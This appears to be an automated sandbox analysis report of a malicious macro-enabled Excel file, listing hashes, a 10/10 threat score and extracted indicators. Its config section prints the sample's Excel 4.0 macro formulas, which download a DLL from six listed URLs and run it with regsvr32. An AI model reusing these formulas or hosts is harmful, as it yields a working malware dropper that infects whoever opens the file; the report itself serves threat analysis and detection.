General
-
Target
aavwelnn
-
Size
46KB
-
Sample
220522-fynqgafeb5
-
MD5
9bd3baddbdf78a835956cc1c694489dd
-
SHA1
3116ae5b338a252985d5bd2c035245fec1b06d45
-
SHA256
7df06f0d1cb53d8ad793f5f1906a65fa0c80bd1d8719f55aa7f26f9b89c1226e
-
SHA512
3c8d56af7d933cb4149abd463c7ef009eca2da903992fa8ae8009c943ede57fd9dc95d6d02455b660555fcd7ed223081175623b513d928e9f9301d5c74ce0d4a
Behavioral task
behavioral1
Sample
aavwelnn.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
aavwelnn.xlsm
Resource
win10v2004-20220414-en
Malware Config
Extracted
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
https://txpcrescue.com/cgi-bin/5tSO8/
http://hadramout21.com/jetpack-temp/Py/
http://haribuilders.com/zoombox-master/4HYGX/
http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()
Extracted
http://eles-tech.com/css/KzMysMqFMs/
http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
Targets
-
-
Target
aavwelnn
-
Size
46KB
-
MD5
9bd3baddbdf78a835956cc1c694489dd
-
SHA1
3116ae5b338a252985d5bd2c035245fec1b06d45
-
SHA256
7df06f0d1cb53d8ad793f5f1906a65fa0c80bd1d8719f55aa7f26f9b89c1226e
-
SHA512
3c8d56af7d933cb4149abd463c7ef009eca2da903992fa8ae8009c943ede57fd9dc95d6d02455b660555fcd7ed223081175623b513d928e9f9301d5c74ce0d4a
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-